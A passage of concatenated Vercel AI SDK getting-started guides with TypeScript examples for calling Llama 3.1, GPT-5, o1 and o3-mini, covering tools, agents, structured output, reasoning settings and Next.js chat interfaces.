import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'What is the weather like today?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
In this example, the getWeather tool allows the model to fetch real-time weather data, enhancing its ability to provide accurate and up-to-date information.
Agents
Agents take your AI applications a step further by allowing models to execute multiple steps (for example, tool calls) in a non-deterministic way, making decisions based on context and user input.
Agents use LLMs to choose the next step in a problem-solving process. They can reason at each step and make decisions based on the evolving context.
Implementing Agents with the AI SDK
The AI SDK supports agent implementation through the stopWhen parameter (for example, stopWhen: stepCountIs(5)). This allows the model to make multiple decisions and tool calls in a single interaction.
Here's an example of an agent that solves math problems:
import { generateText, tool, stepCountIs } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import * as mathjs from 'mathjs';
import { z } from 'zod';
const problem =
'Calculate the profit for a day if revenue is $5000 and expenses are $3500.';
const { text: answer } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
system:
'You are solving math problems. Reason step by step. Use the calculator when necessary.',
prompt: problem,
tools: {
calculate: tool({
description: 'A tool for evaluating mathematical expressions.',
inputSchema: z.object({ expression: z.string() }),
execute: async ({ expression }) => mathjs.evaluate(expression),
}),
},
stopWhen: stepCountIs(5),
});
In this example, the agent can use the calculator tool multiple times if needed, reasoning through the problem step by step.
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Llama 3.1 (via DeepInfra):
import { deepinfra } from '@ai-sdk/deepinfra';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
return null;
})}
</div>
))}
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then streamed back in real-time and displayed in the chat UI.
This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.
Going Beyond Text
The AI SDK's React Server Components (RSC) API enables you to create rich, interactive interfaces that go beyond simple text generation. With the streamUI function, you can dynamically stream React components from the server to the client.
Let's dive into how you can leverage tools with AI SDK RSC to build a generative user interface with Next.js (App Router).
First, create a Server Action.
'use server';
import { streamUI } from '@ai-sdk/rsc';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';
export async function streamComponent() {
const result = await streamUI({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'Get the weather for San Francisco',
text: ({ content }) => <div>{content}</div>,
tools: {
getWeather: {
description: 'Get the weather for a location',
inputSchema: z.object({ location: z.string() }),
generate: async function* ({ location }) {
yield <div>loading...</div>;
const weather = '25c'; // await getWeather(location);
return (
<div>
the weather in {location} is {weather}.
</div>
);
},
},
},
});
return result.value;
}
In this example, if the model decides to use the getWeather tool, it will first yield a div while fetching the weather data, then return a weather component with the fetched data (note: static data in this example). This allows for a more dynamic and responsive UI that can adapt based on the AI's decisions and external data.
On the frontend, you can call this Server Action like any other asynchronous function in your application. In this case, the function returns a regular React component.
'use client';
import { useState } from 'react';
import { streamComponent } from './actions';
export default function Page() {
const [component, setComponent] = useState<React.ReactNode>();
return (
<div>
<form
onSubmit={async e => {
e.preventDefault();
setComponent(await streamComponent());
}}
>
<button>Stream Component</button>
</form>
<div>{component}</div>
</div>
);
}
To see AI SDK RSC in action, check out our open-source Next.js Gemini Chatbot.
Migrate from OpenAI
One of the key advantages of the AI SDK is its unified API, which makes it incredibly easy to switch between different AI models and providers. This flexibility is particularly useful when you want to migrate from one model to another, such as moving from OpenAI's GPT models to Meta's Llama models hosted on DeepInfra.
Here's how simple the migration process can be:
OpenAI Example:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('gpt-4.1'),
prompt: 'What is love?',
});
Llama on DeepInfra Example:
import { generateText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'What is love?',
});
Thanks to the unified API, the core structure of the code remains the same. The main differences are:
- Creating a DeepInfra provider instance instead of an OpenAI one
- Changing the model name from openai('gpt-4.1') to deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct')
With just these few changes, you've migrated from OpenAI's GPT-4.1 to Meta's Llama 3.1 hosted on DeepInfra. The generateText function and its usage remain identical, showcasing the power of the AI SDK's unified API.
This feature allows you to easily experiment with different models, compare their performance, and choose the best one for your specific use case without having to rewrite large portions of your codebase.
Prompt Engineering and Fine-tuning
While the Llama 3.1 family of models is powerful out of the box, its performance can be enhanced through effective prompt engineering and fine-tuning techniques.
Prompt Engineering
Prompt engineering is the practice of crafting input prompts to elicit desired outputs from language models. It involves structuring and phrasing prompts in ways that guide the model towards producing more accurate, relevant, and coherent responses.
For more information on prompt engineering techniques specific to Llama models, see Meta's official Llama documentation.
Fine-tuning
Fine-tuning involves further training a pre-trained model on a specific dataset or task to customize its performance for particular use cases. This process allows you to adapt Llama 3.1 to your specific domain or application, potentially improving its accuracy and relevance for your needs.
To learn more about fine-tuning Llama models, check out these resources:
- Official Fine-tuning Llama Guide
- Fine-tuning and Inference with Llama 3
- Fine-tuning Models with Fireworks AI
- Fine-tuning Llama with Modal
Conclusion
The AI SDK offers a powerful and flexible way to integrate cutting-edge AI models like Llama 3.1 into your applications. With AI SDK Core, you can seamlessly switch between different AI models and providers by changing just two lines of code. This flexibility allows for quick experimentation and adaptation, reducing the time required to change models from days to minutes.
The AI SDK ensures that your application remains clean and modular, accelerating development and future-proofing against the rapidly evolving landscape.
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Get started with GPT-5 description: Get started with GPT-5 using the AI SDK. tags: ['getting-started']
Get started with OpenAI GPT-5
With the release of OpenAI's GPT-5 model, there has never been a better time to start building AI applications with advanced capabilities like verbosity control, web search, and native multi-modal understanding.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI GPT-5 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI GPT-5
OpenAI's GPT-5 represents their latest advancement in language models, offering powerful new features including verbosity control for tailored response lengths, integrated web search capabilities, reasoning summaries for transparency, and native support for text, images, audio, and PDFs. The model is available in three variants: gpt-5, gpt-5-mini for faster, more cost-effective processing, and gpt-5-nano for ultra-efficient operations.
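Because all three variants live behind the same provider, switching between them is a one-line change (a sketch using the variant IDs named above):
import { openai } from '@ai-sdk/openai';
// Trade capability for speed and cost by swapping the model ID
const full = openai('gpt-5');
const mini = openai('gpt-5-mini');
const nano = openai('gpt-5-nano');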
Prompt Engineering for GPT-5
Here are the key strategies for effective prompting:
Core Principles
- Be precise and unambiguous: Avoid contradictory or ambiguous instructions. GPT-5 performs best with clear, explicit guidance.
- Use structured prompts: Leverage XML-like tags to organize different sections of your instructions for better clarity.
- Natural language works best: While being precise, write prompts as you would explain to a skilled colleague.
Prompting Techniques
1. Agentic Workflow Control
- Adjust the reasoningEffort parameter to calibrate model autonomy
- Set clear stop conditions and define explicit tool call budgets
- Provide guidance on exploration depth and persistence
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Example with reasoning effort control
const result = await generateText({
model: openai('gpt-5'),
prompt: 'Analyze this complex dataset and provide insights.',
providerOptions: {
openai: {
reasoningEffort: 'high', // Increases autonomous exploration
},
},
});
2. Structured Prompt Format Use XML-like tags to organize your prompts:
<context_gathering>
Goal: Extract key performance metrics from the report
Method: Focus on quantitative data and year-over-year comparisons
Early stop criteria: Stop after finding 5 key metrics
</context_gathering>
<task>
Analyze the attached financial report and identify the most important metrics.
</task>
3. Tool Calling Best Practices
- Use tool preambles to provide clear upfront plans (see the sketch after this list)
- Define safe vs. unsafe actions for different tools
- Create structured updates about tool call progress
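One way to encode these practices is through the system prompt. The wording below is purely illustrative, not an official pattern:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('gpt-5'),
system:
'Before calling a tool, state your plan in one sentence. ' +
'Treat read-only tools as safe; ask before any tool that modifies data. ' +
'Report progress after each tool call.',
prompt: 'Tidy up the duplicate entries in my contacts list.',
// tools: { ... } (tool definitions omitted from this sketch)
});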
4. Verbosity Control
- Use the textVerbosity parameter to control response length programmatically
- Override with natural language when needed for specific contexts
- Balance between conciseness and completeness
5. Optimization Workflow
- Start with a clear, simple prompt
- Test and identify areas of ambiguity or confusion
- Iteratively refine by removing contradictions
- Consider using OpenAI's Prompt Optimizer tool for complex prompts
- Document successful patterns for reuse
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI GPT-5 with the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('gpt-5'),
prompt: 'Explain the concept of quantum entanglement.',
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { output } = await generateText({
model: openai('gpt-5'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({ name: z.string(), amount: z.string() }),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Verbosity Control
One of GPT-5's new features is verbosity control, allowing you to adjust response length without modifying your prompt:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Concise response
const { text: conciseText } = await generateText({
model: openai('gpt-5'),
prompt: 'Explain quantum computing.',
providerOptions: {
openai: {
textVerbosity: 'low', // Produces terse, minimal responses
},
},
});
// Detailed response
const { text: detailedText } = await generateText({
model: openai('gpt-5'),
prompt: 'Explain quantum computing.',
providerOptions: {
openai: {
textVerbosity: 'high', // Produces comprehensive, detailed responses
},
},
});
Web Search
GPT-5 can access real-time information through the integrated web search tool:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateText({
model: openai('gpt-5'),
prompt: 'What are the latest developments in AI this week?',
tools: {
web_search: openai.tools.webSearch({
searchContextSize: 'high',
}),
},
});
// Access URL sources
const sources = result.sources;
Reasoning Summaries
For transparency into GPT-5's thought process, enable reasoning summaries:
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
const result = streamText({
model: openai('gpt-5'),
prompt:
'Solve this logic puzzle: If all roses are flowers and some flowers fade quickly, do all roses fade quickly?',
providerOptions: {
openai: {
reasoningSummary: 'detailed', // 'auto' for condensed or 'detailed' for comprehensive
},
},
});
// Stream reasoning and text separately
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
console.log(part.textDelta);
} else if (part.type === 'text-delta') {
process.stdout.write(part.textDelta);
}
}
Using Tools with the AI SDK
GPT-5 supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:
import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { toolResults } = await generateText({
model: openai('gpt-5'),
prompt: 'What is the weather like today in San Francisco?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI GPT-5:
In a new Next.js application, first install the AI SDK and the OpenAI provider:
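With pnpm, for instance (packages matching the imports used in this guide):
pnpm add ai @ai-sdk/react @ai-sdk/openai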
Then, create a route handler for the chat endpoint:
import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: openai('gpt-5'),
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
return null;
})}
</div>
))}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/cookbook to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/cookbook/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Get started with OpenAI o1 description: Get started with OpenAI o1 using the AI SDK. tags: ['getting-started', 'reasoning']
Get started with OpenAI o1
With the release of OpenAI's o1 series models, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI o1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI o1
OpenAI released a series of AI models designed to spend more time thinking before responding. They can reason through complex tasks and solve harder problems than previous models in science, coding, and math. These models, named the o1 series, are trained with reinforcement learning and can "think before they answer". As a result, they are able to produce a long internal chain of thought before responding to a prompt.
The main reasoning model available in the API is:
- o1: Designed to reason about hard problems using broad general knowledge about the world.
| Model | Streaming | Tools | Object Generation | Reasoning Effort |
|---|---|---|---|---|
| o1 | Supported | Supported | Supported | Supported |
Benchmarks
OpenAI o1 models excel in scientific reasoning, with impressive performance across various domains:
- Ranking in the 89th percentile on competitive programming questions (Codeforces)
- Placing among the top 500 students in the US in a qualifier for the USA Math Olympiad (AIME)
- Exceeding human PhD-level accuracy on a benchmark of physics, biology, and chemistry problems (GPQA)
Prompt Engineering for o1 Models
The o1 models perform best with straightforward prompts. Some prompt engineering techniques, like few-shot prompting or instructing the model to "think step by step," may not enhance performance and can sometimes hinder it. Here are some best practices:
- Keep prompts simple and direct: The models excel at understanding and responding to brief, clear instructions without the need for extensive guidance.
- Avoid chain-of-thought prompts: Since these models perform reasoning internally, prompting them to "think step by step" or "explain your reasoning" is unnecessary.
- Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input, helping the model interpret different sections appropriately (see the sketch after this list).
- Limit additional context in retrieval-augmented generation (RAG): When providing additional context or documents, include only the most relevant information to prevent the model from overcomplicating its response.
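A sketch of a delimited prompt (the tags and content are illustrative):
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('o1'),
prompt: `<instructions>Summarize the report in two sentences.</instructions>
<report>
Quarterly revenue grew 12% while costs stayed flat...
</report>`,
});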
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o1 with the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('o1'),
prompt: 'Explain the concept of quantum entanglement.',
});
AI SDK Core abstracts away the differences between model providers, allowing you to focus on building great applications. The unified interface also means that you can easily switch between models by changing just one line of code, for example to the smaller, faster o1-mini:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('o1-mini'),
prompt: 'Explain the concept of quantum entanglement.',
});
Refining Reasoning Effort
You can control the amount of reasoning effort expended by o1 through the reasoningEffort parameter.
This parameter can be set to 'low', 'medium', or 'high' to adjust how much time and computation the model spends on internal reasoning before producing a response.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Reduce reasoning effort for faster responses
const { text } = await generateText({
model: openai('o1'),
prompt: 'Explain quantum entanglement briefly.',
providerOptions: {
openai: { reasoningEffort: 'low' },
},
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { output } = await generateText({
model: openai('o1'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({ name: z.string(), amount: z.string() }),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Structured object generation is supported with o1.
Tools
While LLMs have incredible generation capabilities, they struggle with discrete tasks (e.g. mathematics) and interacting with the outside world (e.g. getting the weather). The solution: tools, which are like programs that you provide to the model, which it can choose to call as necessary.
Using Tools with the AI SDK
The AI SDK supports tool usage across several of its functions, like generateText and streamText. By passing one or more tools to the tools parameter, you can extend the capabilities of LLMs, allowing them to perform discrete tasks and interact with external systems.
Here's an example of how you can use a tool with the AI SDK and o1:
import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { text } = await generateText({
model: openai('o1'),
prompt: 'What is the weather like today?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.
Tools are compatible with o1.
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o1:
import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow responses up to 5 minutes
export const maxDuration = 300;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: openai('o1'),
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
return null;
})}
</div>
))}
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out our support for the o1 series of reasoning models in the OpenAI Provider.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Get started with OpenAI o3-mini description: Get started with OpenAI o3-mini using the AI SDK. tags: ['getting-started', 'reasoning']
Get started with OpenAI o3-mini
With the release of OpenAI's o3-mini model, there has never been a better time to start building AI applications, particularly those that require complex STEM reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI o3-mini alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI o3-mini
OpenAI recently released a new AI model optimized for STEM reasoning that excels in science, math, and coding tasks. o3-mini matches o1's performance in these domains while delivering faster responses and lower costs. The model supports tool calling, structured outputs, and system messages, making it a great option for a wide range of applications.
o3-mini offers three reasoning effort levels:
- Low: Optimized for speed while maintaining solid reasoning capabilities
- Medium: Balanced approach matching o1's performance levels
- High: Enhanced reasoning power exceeding o1 in many STEM domains
| Model | Streaming | Tool Calling | Structured Output | Reasoning Effort | Image Input |
|---|---|---|---|---|---|
| o3-mini | Supported | Supported | Supported | Supported | Not supported |
Benchmarks
OpenAI o3-mini demonstrates impressive performance across technical domains:
- 87.3% accuracy on AIME competition math questions
- 79.7% accuracy on PhD-level science questions (GPQA Diamond)
- 2130 Elo rating on competitive programming (Codeforces)
- 49.3% accuracy on verified software engineering tasks (SWE-bench)
These benchmark results were obtained using the high reasoning effort setting.
Prompt Engineering for o3-mini
The o3-mini model performs best with straightforward prompts. Some prompt engineering techniques, like few-shot prompting or instructing the model to "think step by step," may not enhance performance and can sometimes hinder it. Here are some best practices:
- Keep prompts simple and direct: The model excels at understanding and responding to brief, clear instructions without the need for extensive guidance.
- Avoid chain-of-thought prompts: Since the model performs reasoning internally, prompting it to "think step by step" or "explain your reasoning" is unnecessary.
- Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o3-mini with the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('o3-mini'),
prompt: 'Explain the concept of quantum entanglement.',
});
Refining Reasoning Effort
You can control the amount of reasoning effort expended by o3-mini through the reasoningEffort parameter.
This parameter can be set to low, medium, or high to adjust how much time and computation the model spends on internal reasoning before producing a response.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Reduce reasoning effort for faster responses
const { text } = await generateText({
model: openai('o3-mini'),
prompt: 'Explain quantum entanglement briefly.',
providerOptions: {
openai: { reasoningEffort: 'low' },
},
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { output } = await generateText({
model: openai('o3-mini'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({ name: z.string(), amount: z.string() }),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Using Tools with the AI SDK
o3-mini supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:
import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { text } = await generateText({
model: openai('o3-mini'),
prompt: 'What is the weather like today in San Francisco?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o3-mini:
In a new Next.js application, first install the AI SDK and the OpenAI provider:
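For example, with pnpm (a typical command; the packages match the imports used in this guide):
pnpm add ai @ai-sdk/openai @ai-sdk/react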
Then, create a route handler for the chat endpoint:
import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow responses up to 5 minutes
export const maxDuration = 300;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: openai('o3-mini'),
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
<form onSubmit={handleSubmit}>
<input name="prompt" value={input} onChange={e => setInput(e.target.value)} />
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out our support for o3-mini in the OpenAI Provider.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Get started with DeepSeek R1 description: Get started with DeepSeek R1 using the AI SDK. tags: ['getting-started', 'reasoning']
Get started with DeepSeek R1
With the release of DeepSeek R1, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.
